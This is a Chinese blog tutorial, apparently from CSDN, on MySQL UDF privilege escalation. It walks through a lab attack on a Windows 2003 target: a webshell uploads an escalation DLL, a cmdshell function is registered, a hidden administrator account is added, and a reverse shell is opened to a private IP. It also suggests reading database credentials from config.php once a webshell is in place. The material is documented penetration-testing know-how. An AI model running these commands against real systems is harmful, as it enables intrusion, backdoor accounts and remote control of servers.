【数据库提权】MySQL提权之UDF提权

最新推荐文章于 2023-05-19 09:31:12 发布
最新推荐文章于 2023-05-19 09:31:12 发布
阅读量997 收藏 4
点赞数 1
分类专栏: 提权 文章标签: 1024程序员节 mysql 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109180421
版权

文章目录

一、什么是UDF?

UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。

二、什么是动态链接库?

DLL 是 Dynamic Link Library 的缩写,译为“动态链接库”。DLL也是一个被编译过的二进制程序,可以被其他程序调用,但与 exe 不同,DLL不能独立运行,必须由其他程序调用载入内存。

DLL 中封装了很多函数,只要知道函数的入口地址,就可以被其他程序调用。

Windows API中所有的函数都包含在DLL中,其中有3个最重要的DLL:

  • Kemel32.dll:它包含那些用于管理内存、进程和线程的函数,例如CreateThread函数;
  • User32.dll:它包含那些用于执行用户界面任务(如窗口的创建和消息的传送)的函数,例如 CreateWindow 函数;
  • GDI32.dll:它包含那些用于画图和显示文本的函数。

说白了就是.dll中封装好了很多函数供外部程序调用。

三、UDF提权原理

正是由于MySQL支持UDF,支持我们自定义函数来扩展功能。当我们创建带有调用cmd函数的'udf.dll'(动态链接库)。当我们把'udf.dll'导出指定文件夹引入Mysql时,其中的调用函数拿出来当作mysql的函数使用。这样我们自定义的函数才被当作本机函数执行。

udf.dll导出指定文件夹:

  • 当 MySQL< 5.1 版本时,将 .dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。
  • 当 MySQL> 5.1 版本时,将 .dll 文件导入到 MySQL Server 5.xx\lib\plugin 目录下 (lib\plugin目录默认不存在,需自行创建)。

plugin目录创建方式:

  • 通过菜刀连接创建
  • 通过mysql语句创建

提权条件:

  • 掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备root账号所具备的权限的其它账号也可以。
  • 可以将udf.dll写入到相应目录的权限。
四、UDF提权复现

实验环境:

  • 靶机Windows2003-x86 + phpstudy php-5.4.54+Apache+mysql-5.5.53
  • 攻击机win7

udf是Mysql类提权的方式之一。前提是已知mysql中root的账号密码,我们在拿到webshell后,可以看网站根目录下的config.php里,一般都有mysql的账号密码。

使用菜刀上传提权马:

在这里插入图片描述
在这里插入图片描述
导出UDF到plugin目录:

在这里插入图片描述
在这里插入图片描述
创建cmdshell:

在这里插入图片描述
查看提权马源码,创建cmdshell实际上就是通过引入的dll动态链接库创建cmdshell函数

在这里插入图片描述
相关命令:

create function cmdshell returns string soname 'moonudf.dll'    // 创建cmdshell
select cmdshell('net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add')   // 添加超级管理员
select cmdshell('net user')  // 查看用户
select cmdshell('netstat -an')  // 查看端口
select name from mysql.func   // 查看创建函数
delete from mysql.func where name='cmdshell'  // 删除cmdshell
create function backshell returns string soname 'moonudf.dll'  // 创建反弹函数
select backshell('192.168.157.130',12345)    // 执行反弹
delete from mysql.func where name='backshell'  // 删除backshell

执行命令:

在这里插入图片描述
在这里插入图片描述
提升后的权限为运行MySQL的用户权限。

参考文章:

http://c.biancheng.net/cpp/html/2750.html
https://xz.aliyun.com/t/2719
https://paper.404sec.com/7815.html
https://blog.csdn.net/qq_36119192/article/details/84863268

多学点技术
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
UDF提权
tubug的博客
03-15 1144
MYSQL权限比较高的时候我们就可以利用UDF提权UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数)UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。
udf提权
qq_44881113的博客
07-19 3754
udf 利用udf提权 UDF为User Defined Function用户自定义函数,也就是支持用户自定义函数的功能。这里的自定义函数要以dll形式写成mysql的插件,提供给mysql来使用。也就是说我们可以通过编写dll文件来实现我们需要的功能,利用UDF提权需要知道root账户的密码 文件末为.so,则为linux系统,如果是win,则后缀为dll 开始提权 1 根据数据库版本选择上传udf.dll的位置 select version(); #查看版本 如果版本号大于5.1.4 上传
udf提权PHP代码
10-30
udf提权PHP代码
mysql提权udf
09-20
mysql免杀UDF 提权必不可少神器。必须配备
MYSQL提权UDF.dll
06-11
MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll
mysql数据库提权所需lib_mysqludf_sys_64.dll(64位)
10-03
提权必备,之后会出对应的提权教程
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
Mysql提权UDF提权
一个普普通通的博客
04-17 889
数据库提权较为实用,但只有在root权限才可以提权 mysql提权udf提权) 借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库 拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php 拿到账号密码直接登录 传udf.dll mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32 如果没有plug
MySQL提权——udf提权
hackzkaq的博客
04-11 6378
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
udf 提权用的
05-28
udf 提权用的
hive自定义UDF函数
思亘七险,点落九宫,神游八极,纵横十方。
04-21 2841
hive自定义UDF函数 1.什么是udfUDF(User-Defined Functions)即是用户自定义的hive函数。hive自带的函数并不能完全满足业务的需求,这时就需要我们自定义函数了。 官网参考地址:LanguageManual UDF 2.UDF分类 1.UDF:one to one ,进来一个出去一个,row mapping。 是row级别操作,如:upper、subs...
Udf/udtf/udaf的实现及使用场景
qq_66455465的博客
05-19 486
UDF可以用于字符串处理、日期处理、数值计算等方面。UDF的实现可以使用Java、Python、Scala等编程语言。UDAF可以用于求平均值、求最大值、求最小值等场景。UDAF的实现可以使用Java、Python、Scala等编程语言。UDTF的实现可以使用Java、Python、Scala等编程语言。UDAF可以用于求平均值、求最大值、求最小值等场景。例如,求某个商品的平均销售额、求某个地区的最高温度、求某个部门的最低工资等。UDF可以用于字符串处理、日期处理、数值计算等场景。
slmap udf提权原理
MzHeader的博客
07-04 1497
0x01-udf是什么? udf = ‘user defined function’,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udfmysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。 0x02-如何使用udf? 假设我的udf文件名为‘udf.dll’,存放在Mysql根目录(通过select @@basedir可知)的‘lib/plugin’目录
MysqlUDF提权
热门推荐
good good study
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
UDF 提权
震山的博客
08-07 1106
关于 UDF 提权的思考
mysql udf 提权
最新发布
03-06
UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值